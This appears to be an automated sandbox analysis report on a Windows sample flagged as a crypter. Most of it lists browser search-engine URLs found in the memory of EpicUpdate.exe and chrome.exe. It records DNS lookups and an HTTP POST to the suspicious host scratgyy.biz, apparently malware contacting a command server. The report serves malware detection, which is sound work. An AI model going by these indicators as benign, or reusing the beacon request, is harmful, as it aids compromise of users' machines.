Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.baidu.com/s?ie={inputEncoding}&wd={searchTerms}https://www.baidu.com/s?ie={inputEncoding}&word={searchTerms}https://www.baidu.com/{google:pathWildcard}/s?ie={inputEncoding}&word={searchTerms}sigs_ssp{google:baseURL}#q={searchTerms}{google:baseURL}search#q={searchTerms}{google:baseURL}webhp#q={searchTerms}{google:baseURL}s#q={searchTerms}{google:baseURL}s?q={searchTerms}https://go.mail.ru/msearch?q={searchTerms}&{mailru:referralID}https://m.so.com/s?ie={inputEncoding}&q={searchTerms}https://m.so.com/index.php?ie={inputEncoding}&q={searchTerms}https://m.sogou.com/web/{google:pathWildcard}?ie={inputEncoding}&keyword={searchTerms}http://searchatlas.centrum.cz/?q={searchTerms}http://hladaj.atlas.sk/fulltext/?phrase={searchTerms}http://isearch.avg.com/search?q={searchTerms}http://search.avg.com/route/?q={searchTerms}&lng={language}https://isearch.avg.com/search?q={searchTerms}https://search.avg.com/route/?q={searchTerms}&lng={language}http://search.babylon.com/?q={searchTerms}http://search.conduit.com/Results.aspx?q={searchTerms}http://www.delfi.lt/paieska/?q={searchTerms}http://www.delta-search.com/?q={searchTerms}http://www1.delta-search.com/home?q={searchTerms}http://www1.delta-search.com/?q={searchTerms}http://www2.delta-search.com/home?q={searchTerms}http://www2.delta-search.com/?q={searchTerms}http://www.search.delta-search.com/home?q={searchTerms}http://www.search.delta-search.com/?q={searchTerms}http://www.yhs.delta-search.com/home?q={searchTerms}http://www.yhs.delta-search.com/?q={searchTerms}http://mixidj.delta-search.com/home?q={searchTerms}http://mixidj.delta-search.com/?q={searchTerms}http://search.goo.ne.jp/web.jsp?MT={searchTerms}&IE={inputEncoding}http://search.goo.ne.jp/sgt.jsp?MT={searchTerms}&CL=plugin&FM=json&IE={inputEncoding}http://search.iminent.com/SearchTheWeb/v6/1033/homepage/Default.aspx#q={searchTerms}http://search.iminent.com/SearchTheWeb/v6/1033/homepage/Result.aspx#q={searchTerms}http://start.iminent.com/?q={searchTerms}http://start.iminent.com/StartWeb/1033/homepage/#q={searchTerms}http://search.incredibar.com/?q={searchTerms}http://mystart.incredibar.com/?search={searchTerms}https://www.neti.ee/cgi-bin/otsing?query={searchTerms}&src=webhttps://www.neti.ee/api/suggestOS?suggestVersion=1&suggestQuery={searchTerms}https://nova.rambler.ru/search?query={searchTerms}https://nova.rambler.ru/suggest?v=3&query={searchTerms}http://www.search-results.com/web?q={searchTerms}http://search.snap.do/?q={searchTerms}http://feed.snapdo.com/?q={searchTerms}http://feed.snap.do/?q={searchTerms}http://en.softonic.com/s/{searchTerms}http://www.softonic.com/s/{searchTerms}http://www.softonic.com.br/s/{searchTerms}http://buscador.softonic.com/?q={searchTerms}http://nl.softonic.com/s/{searchTerms}https://search.softonic.com/?q={searchTerms}https://en.softonic.com/s/{searchTerms}https://www.softonic.com/s/{searchTerms}https://www.softonic.com.br/s/{searchTerms}https://buscador.softonic.com/?q={searchTerms}https://nl.softonic.com/s/{se
Source: chrome.exe, 00000003.00000002.32746127811.00005C8C03598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.32739868769.00005C8C02AF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.32746127811.00005C8C03598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.32739868769.00005C8C02AF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.32747973405.00005C8C039A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.32747973405.00005C8C039A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlult equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: scratgyy.biz
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: scratgyy.biz

Source: global traffic	TCP traffic: 192.168.11.20:54200 -> 239.255.255.250:1900
Source: global traffic	TCP traffic: 192.168.11.20:54200 -> 239.255.255.250:1900
Source: global traffic	TCP traffic: 192.168.11.20:54200 -> 239.255.255.250:1900
Source: global traffic	TCP traffic: 192.168.11.20:54200 -> 239.255.255.250:1900

Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ak.apnstatic.com/media/images/favicon_search-results.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ak.apnstatic.com/media/images/favicon_search-results.icohttp://dts.search-results.com/sr?lng=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://arianna.libero.it/search/abin/integrata.cgi?query=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://autocomplete.nigma.ru/complete/query_help.php?suggest=true&q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://clients3.google.com/cert_upload_json
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/1138528
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dts.search-results.com/sr?lng=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://find.in.gr/?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://find.in.gr/Themes/1/Default/Media/Layout/icon_in.png
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://find.in.gr/Themes/1/Default/Media/Layout/icon_in.pnghttp://find.in.gr/?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://g1.delphi.lv/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://g1.delphi.lv/favicon.icohttp://www.delfi.lv/search_all/?ie=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://i.rl0.ru/2011/icons/rambler.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://i.rl0.ru/2011/icons/rambler.icohttp://nova.rambler.ru/search?query=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://imgs.sapo.pt/images/sapo.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://imgs.sapo.pt/images/sapo.icohttp://pesquisa.sapo.pt/?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://linkurystoragenorthus.blob.core.windows.net/static/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://linkurystoragenorthus.blob.core.windows.net/static/favicon.icohttp://search.snapdo.com/?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ms1.iol.it/graph_hf/v.8.3.04/themes/default/img/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ms1.iol.it/graph_hf/v.8.3.04/themes/default/img/favicon.icohttp://arianna.libero.it/search/ab
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nigma.ru/?s=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nigma.ru/themes/nigma/img/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nigma.ru/themes/nigma/img/favicon.icohttp://nigma.ru/?s=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nova.rambler.ru/search?query=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nova.rambler.ru/suggest?v=3&query=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ok.hu/gfx/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ok.hu/gfx/favicon.icohttp://ok.hu/katalogus?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ok.hu/katalogus?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesquisa.sapo.pt/?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesquisa.sapo.pt/livesapo?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://radce.centrum.cz/?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://report-example.test/test
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://search.avg.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://search.avg.com/favicon.icohttp://search.avg.com/search?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://search.avg.com/search?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://search.babylon.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://search.babylon.com/favicon.icohttp://search.babylon.com/home?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://search.babylon.com/home?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://search.imesh.net/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://search.imesh.net/favicon.icohttp://search.imesh.net/music?hl=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://search.imesh.net/music?hl=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://search.iminent.com/?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://search.iminent.com/Shared/Images/favicon_gl.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://search.iminent.com/Shared/Images/favicon_gl.icohttp://search.iminent.com/?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://search.incredibar.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://search.incredibar.com/favicon.icohttp://search.incredibar.com/search.php?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://search.incredibar.com/search.php?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://search.snapdo.com/?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://searchfunmoods.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://searchfunmoods.com/favicon.icohttp://searchfunmoods.com/results.php?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://searchfunmoods.com/results.php?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://static.mediacentrum.sk/katalog/atlas.sk/images/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://static.mediacentrum.sk/katalog/atlas.sk/images/favicon.icohttps://hladaj.atlas.sk/fulltext/?p
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.conduit.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.conduit.com/favicon.icohttp://www.conduit.com/search?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.conduit.com/search?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.delfi.lv/search_all/?ie=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.delta-search.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.delta-search.com/favicon.icohttp://www.delta-search.com/home?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.delta-search.com/home?q=
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31848251825.000001ECC2F50000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31903198582.000001ECC3157000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31888277681.000001ECC3256000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.intel.com/support/gfx_feedback
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.neti.ee/api/suggestOS?suggestQuery=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.neti.ee/cgi-bin/otsing?query=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.neti.ee/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.neti.ee/favicon.icohttp://www.neti.ee/cgi-bin/otsing?query=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.searchnu.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.searchnu.com/favicon.icohttp://www.searchnu.com/web?hl=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.searchnu.com/web?hl=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.webrtc.org/experiments/rtp-hdrext/abs-capture-time
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.webrtc.org/experiments/rtp-hdrext/abs-send-time
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.webrtc.org/experiments/rtp-hdrext/abs-send-timeCreating
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.webrtc.org/experiments/rtp-hdrext/generic-frame-descriptor-00
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.webrtc.org/experiments/rtp-hdrext/generic-frame-descriptor-00https://aomediacodec.github.
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.32741436014.00005C8C02DA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.search.naver.com/nx/ac?of=os&ie=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aomediacodec.github.io/av1-rtp-spec/#dependency-descriptor-rtp-header-extension
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.karmasearch.org/search/autosuggest?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.oceanhero.today/suggestions?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.qwant.com/api/suggest/?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.yep.com/ac/?query=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.you.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.you.com/favicon.icohttps://you.com/search?tbm=youchat&q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ar.search.yahoo.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ar.search.yahoo.com/favicon.icohttps://ar.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ar.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ar.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://at.search.yahoo.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://at.search.yahoo.com/favicon.icohttps://at.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://at.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://at.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://au.search.yahoo.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://au.search.yahoo.com/favicon.icohttps://au.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://au.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://au.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://br.search.yahoo.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://br.search.yahoo.com/favicon.icohttps://br.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://br.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://br.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ca.search.yahoo.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ca.search.yahoo.com/favicon.icohttps://ca.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ca.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ca.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.32742482634.00005C8C02F94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.search.brave.com/serp/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.search.brave.com/serp/favicon.icohttps://search.brave.com/search?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.yep.com/static/meta/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.yep.com/static/meta/favicon.icohttps://yep.com/web?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cl.search.yahoo.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cl.search.yahoo.com/favicon.icohttps://cl.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cl.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cl.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://co.search.yahoo.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://co.search.yahoo.com/favicon.icohttps://co.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://co.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://co.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://coccoc.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://coccoc.com/favicon.icohttps://coccoc.com/search#query=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://coccoc.com/search#query=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1161355
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1214923
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1237175
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1313172
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1338622.
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/333424893
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/341254292
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/342701242
